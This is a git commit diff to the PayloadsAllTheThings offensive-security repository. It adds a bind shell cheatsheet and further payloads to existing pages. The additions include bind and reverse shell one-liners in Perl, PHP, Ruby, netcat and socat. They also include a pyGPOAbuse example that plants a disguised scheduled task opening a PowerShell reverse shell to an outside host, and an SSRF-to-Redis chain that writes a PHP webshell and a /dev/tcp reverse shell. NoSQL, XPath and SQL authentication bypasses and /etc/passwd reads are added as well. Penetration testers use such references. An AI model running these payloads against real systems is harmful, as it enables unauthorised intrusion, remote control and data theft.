mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-04 18:40:41 +00:00
Bind shell cheatsheet (Fix #194)
This commit is contained in:
parent
c734586e72
commit
4ca5e71c2f
10 changed files with 134 additions and 13 deletions
|
@ -4,10 +4,15 @@
|
|||
|
||||
## Summary
|
||||
|
||||
* [Tools](#tools)
|
||||
* [Prerequisites](#prerequisites)
|
||||
* [Exploitation](#exploitation)
|
||||
* [References](#references)
|
||||
|
||||
## Tools
|
||||
|
||||
* [Corsy - CORS Misconfiguration Scanner](https://github.com/s0md3vCorsy/)
|
||||
|
||||
## Prerequisites
|
||||
|
||||
* BURP HEADER> `Origin: https://evil.com`
|
||||
|
|
|
@ -111,8 +111,9 @@ something%0Acat%20/etc/passwd
|
|||
|
||||
### Bypass characters filter via hex encoding
|
||||
|
||||
linux
|
||||
```
|
||||
Linux
|
||||
|
||||
```powershell
|
||||
swissky@crashlab▸ ~ ▸ $ echo -e "\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64"
|
||||
/etc/passwd
|
||||
|
||||
|
@ -136,29 +137,22 @@ swissky@crashlab▸ ~ ▸ $ xxd -r -ps <(echo 2f6574632f706173737764)
|
|||
|
||||
swissky@crashlab▸ ~ ▸ $ cat `xxd -r -ps <(echo 2f6574632f706173737764)`
|
||||
root:x:0:0:root:/root:/bin/bash
|
||||
|
||||
```
|
||||
|
||||
### Bypass characters filter
|
||||
|
||||
Commands execution without backslash and slash - linux bash
|
||||
|
||||
```
|
||||
```powershell
|
||||
swissky@crashlab▸ ~ ▸ $ echo ${HOME:0:1}
|
||||
/
|
||||
|
||||
swissky@crashlab▸ ~ ▸ $ cat ${HOME:0:1}etc${HOME:0:1}passwd
|
||||
root:x:0:0:root:/root:/bin/bash
|
||||
|
||||
swissky@crashlab▸ ~ ▸ $ echo . | tr '!-0' '"-1'
|
||||
/
|
||||
|
||||
swissky@crashlab▸ ~ ▸ $ tr '!-0' '"-1' <<< .
|
||||
/
|
||||
|
||||
swissky@crashlab▸ ~ ▸ $ cat $(echo . | tr '!-0' '"-1')etc$(echo . | tr '!-0' '"-1')passwd
|
||||
root:x:0:0:root:/root:/bin/bash
|
||||
|
||||
```
|
||||
|
||||
### Bypass Blacklisted words
|
||||
|
|
|
@ -427,7 +427,23 @@ SharpGPOAbuse.exe --AddUserScript --ScriptName StartupScript.bat --ScriptContent
|
|||
SharpGPOAbuse.exe --AddComputerTask --TaskName "Update" --Author DOMAIN\Admin --Command "cmd.exe" --Arguments "/c powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://10.1.1.10:80/a'))\"" --GPOName "Vulnerable GPO"
|
||||
```
|
||||
|
||||
Abuse GPO with PowerView
|
||||
Abuse GPO with **pyGPOAbuse**
|
||||
|
||||
```powershell
|
||||
git clone https://github.com/Hackndo/pyGPOAbuse
|
||||
# Add john user to local administrators group (Password: H4x00r123..)
|
||||
./pygpoabuse.py DOMAIN/user -hashes lm:nt -gpo-id "12345677-ABCD-9876-ABCD-123456789012"
|
||||
|
||||
# Reverse shell example
|
||||
./pygpoabuse.py DOMAIN/user -hashes lm:nt -gpo-id "12345677-ABCD-9876-ABCD-123456789012" \
|
||||
-powershell \
|
||||
-command "\$client = New-Object System.Net.Sockets.TCPClient('10.20.0.2',1234);\$stream = \$client.GetStream();[byte[]]\$bytes = 0..65535|%{0};while((\$i = \$stream.Read(\$bytes, 0, \$bytes.Length)) -ne 0){;\$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$bytes,0, \$i);\$sendback = (iex \$data 2>&1 | Out-String );\$sendback2 = \$sendback + 'PS ' + (pwd).Path + '> ';\$sendbyte = ([text.encoding]::ASCII).GetBytes(\$sendback2);\$stream.Write(\$sendbyte,0,\$sendbyte.Length);\$stream.Flush()};\$client.Close()" \
|
||||
-taskname "Completely Legit Task" \
|
||||
-description "Dis is legit, pliz no delete" \
|
||||
-user
|
||||
```
|
||||
|
||||
Abuse GPO with **PowerView**
|
||||
|
||||
```powershell
|
||||
# Enumerate GPO
|
||||
|
|
71
Methodology and Resources/Bind Shell Cheatsheet.md
Normal file
71
Methodology and Resources/Bind Shell Cheatsheet.md
Normal file
|
@ -0,0 +1,71 @@
|
|||
# Bind Shell
|
||||
|
||||
## Summary
|
||||
|
||||
* [Reverse Shell](#reverse-shell)
|
||||
* [Perl](#perl)
|
||||
* [Python](#python)
|
||||
* [PHP](#php)
|
||||
* [Ruby](#ruby)
|
||||
* [Netcat Traditional](#netcat-traditional)
|
||||
* [Netcat OpenBsd](#netcat-openbsd)
|
||||
* [Ncat](#ncat)
|
||||
* [Socat](#socat)
|
||||
* [Powershell](#powershell)
|
||||
|
||||
|
||||
## Perl
|
||||
|
||||
```perl
|
||||
perl -e 'use Socket;$p=51337;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));\
|
||||
bind(S,sockaddr_in($p, INADDR_ANY));listen(S,SOMAXCONN);for(;$p=accept(C,S);\
|
||||
close C){open(STDIN,">&C");open(STDOUT,">&C");open(STDERR,">&C");exec("/bin/bash -i");};'
|
||||
```
|
||||
|
||||
## PHP
|
||||
|
||||
```php
|
||||
php -r '$s=socket_create(AF_INET,SOCK_STREAM,SOL_TCP);socket_bind($s,"0.0.0.0",51337);\
|
||||
socket_listen($s,1);$cl=socket_accept($s);while(1){if(!socket_write($cl,"$ ",2))exit;\
|
||||
$in=socket_read($cl,100);$cmd=popen("$in","r");while(!feof($cmd)){$m=fgetc($cmd);\
|
||||
socket_write($cl,$m,strlen($m));}}'
|
||||
```
|
||||
|
||||
## Ruby
|
||||
|
||||
```ruby
|
||||
ruby -rsocket -e 'f=TCPServer.new(51337);s=f.accept;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",s,s,s)'
|
||||
```
|
||||
|
||||
## Netcat Traditional
|
||||
|
||||
```powershell
|
||||
nc -nlvp 51337 -e /bin/bash
|
||||
```
|
||||
|
||||
## Netcat OpenBsd
|
||||
|
||||
```powershell
|
||||
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc -lvp 51337 >/tmp/f
|
||||
```
|
||||
|
||||
## Socat
|
||||
|
||||
```powershell
|
||||
user@attacker$ socat FILE:`tty`,raw,echo=0 TCP:target.com:12345
|
||||
user@victim$ socat TCP-LISTEN:12345,reuseaddr,fork EXEC:/bin/sh,pty,stderr,setsid,sigint,sane
|
||||
```
|
||||
|
||||
## Powershell
|
||||
|
||||
```powershell
|
||||
https://github.com/besimorhino/powercat
|
||||
|
||||
# Victim (listen)
|
||||
. .\powercat.ps1
|
||||
powercat -l -p 7002 -ep
|
||||
|
||||
# Connect from attacker
|
||||
. .\powercat.ps1
|
||||
powercat -c 127.0.0.1 -p 7002
|
||||
```
|
|
@ -154,6 +154,9 @@ sshuttle -vvr username@pivot_host 10.2.2.0/24
|
|||
|
||||
# using a private key
|
||||
$ sshuttle -vvr root@10.10.10.10 10.1.1.0/24 -e "ssh -i ~/.ssh/id_rsa"
|
||||
|
||||
# -x == exclude some network to not transmit over the tunnel
|
||||
# -x x.x.x.x.x/24
|
||||
```
|
||||
|
||||
## chisel
|
||||
|
|
|
@ -114,6 +114,11 @@ C:\Python27\python.exe -c "(lambda __y, __g, __contextlib: [[[[[[[(s.connect(('1
|
|||
|
||||
```bash
|
||||
php -r '$sock=fsockopen("10.0.0.1",4242);exec("/bin/sh -i <&3 >&3 2>&3");'
|
||||
php -r '$sock=fsockopen("10.0.0.1",4242);shell_exec("/bin/sh -i <&3 >&3 2>&3");'
|
||||
php -r '$sock=fsockopen("10.0.0.1",4242);`/bin/sh -i <&3 >&3 2>&3`;'
|
||||
php -r '$sock=fsockopen("10.0.0.1",4242);system("/bin/sh -i <&3 >&3 2>&3");'
|
||||
php -r '$sock=fsockopen("10.0.0.1",4242);passthru("/bin/sh -i <&3 >&3 2>&3");'
|
||||
php -r '$sock=fsockopen("10.0.0.1",4242);popen("/bin/sh -i <&3 >&3 2>&3", "r");'
|
||||
```
|
||||
|
||||
```bash
|
||||
|
|
|
@ -27,8 +27,11 @@
|
|||
Basic authentication bypass using not equal ($ne) or greater ($gt)
|
||||
|
||||
```json
|
||||
in URL
|
||||
in DATA
|
||||
username[$ne]=toto&password[$ne]=toto
|
||||
login[$regex]=a.*&pass[$ne]=lol
|
||||
login[$gt]=admin&login[$lt]=test&pass[$ne]=1
|
||||
login[$nin][]=admin&login[$nin][]=test&pass[$ne]=toto
|
||||
|
||||
in JSON
|
||||
{"username": {"$ne": null}, "password": {"$ne": null}}
|
||||
|
|
|
@ -31,6 +31,7 @@ Attempting to manipulate SQL queries may have goals including:
|
|||
* [Using suffix to tamper the injection](#using-suffix-to-tamper-the-injection)
|
||||
* [General tamper option and tamper's list](#general-tamper-option-and-tampers-list)
|
||||
* [Authentication bypass](#authentication-bypass)
|
||||
* [Authentication Bypass (Raw MD5 SHA1)](#authentication-bypass-raw-md5-sha1)
|
||||
* [Polyglot injection](#polyglot-injection-multicontext)
|
||||
* [Routed injection](#routed-injection)
|
||||
* [Insert Statement - ON DUPLICATE KEY UPDATE](#insert-statement---on-duplicate-key-update)
|
||||
|
@ -365,7 +366,7 @@ admin") or "1"="1"/*
|
|||
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
|
||||
```
|
||||
|
||||
## Authentication Bypass (Raw MD5)
|
||||
## Authentication Bypass (Raw MD5 SHA1)
|
||||
|
||||
When a raw md5 is used, the pass will be queried as a simple string, not a hexstring.
|
||||
|
||||
|
@ -377,6 +378,7 @@ Allowing an attacker to craft a string with a `true` statement such as `' or 'SO
|
|||
|
||||
```php
|
||||
md5("ffifdyop", true) = 'or'6<>]<5D><>!r,<2C><>b
|
||||
sha1("3fDf ", true) = Q<>u'='<27>@<40>[<5B>t<EFBFBD>- o<><6F>_-!
|
||||
```
|
||||
|
||||
Challenge demo available at [http://web.jarvisoj.com:32772](http://web.jarvisoj.com:32772)
|
||||
|
|
|
@ -31,6 +31,7 @@
|
|||
* [gopher://](#gopher)
|
||||
* [netdoc://](#netdoc)
|
||||
* [SSRF exploiting WSGI](#ssrf-exploiting-wsgi)
|
||||
* [SSRF exploiting Redis](#ssrf-exploiting-redis)
|
||||
* [SSRF to XSS](#ssrf-to-xss)
|
||||
* [SSRF URL for Cloud Instances](#ssrf-url-for-cloud-instances)
|
||||
* [SSRF URL for AWS Bucket](#ssrf-url-for-aws-bucket)
|
||||
|
@ -388,6 +389,24 @@ gopher://localhost:8000/_%00%1A%00%00%0A%00UWSGI_FILE%0C%00/tmp/test.py
|
|||
| value data | (n bytes) | | /tmp/test.py | |
|
||||
|
||||
|
||||
## SSRF exploiting Redis
|
||||
|
||||
> Redis is a database system that stores everything in RAM
|
||||
|
||||
```powershell
|
||||
# Getting a webshell
|
||||
url=dict://127.0.0.1:6379/CONFIG%20SET%20dir%20/var/www/html
|
||||
url=dict://127.0.0.1:6379/CONFIG%20SET%20dbfilename%20file.php
|
||||
url=dict://127.0.0.1:6379/SET%20mykey%20"<\x3Fphp system($_GET[0])\x3F>"
|
||||
url=dict://127.0.0.1:6379/SAVE
|
||||
|
||||
# Getting a PHP reverse shell
|
||||
gopher://127.0.0.1:6379/_config%20set%20dir%20%2Fvar%2Fwww%2Fhtml
|
||||
gopher://127.0.0.1:6379/_config%20set%20dbfilename%20reverse.php
|
||||
gopher://127.0.0.1:6379/_set%20payload%20%22%3C%3Fphp%20shell_exec%28%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2FREMOTE_IP%2FREMOTE_PORT%200%3E%261%27%29%3B%3F%3E%22
|
||||
gopher://127.0.0.1:6379/_save
|
||||
```
|
||||
|
||||
## SSRF to XSS
|
||||
|
||||
by [@D0rkerDevil & @alyssa.o.herrera](https://medium.com/@D0rkerDevil/how-i-convert-ssrf-to-xss-in-a-ssrf-vulnerable-jira-e9f37ad5b158)
|
||||
|
|
|
@ -28,6 +28,9 @@ x' or name()='username' or 'x'='y
|
|||
' and count(/*)=1 and '1'='1
|
||||
' and count(/@*)=1 and '1'='1
|
||||
' and count(/comment())=1 and '1'='1
|
||||
search=')] | //user/*[contains(*,'
|
||||
search=Har') and contains(../password,'c
|
||||
search=Har') and starts-with(../password,'c
|
||||
```
|
||||
|
||||
## Blind Exploitation
|
||||
|
|
Loading…
Reference in a new issue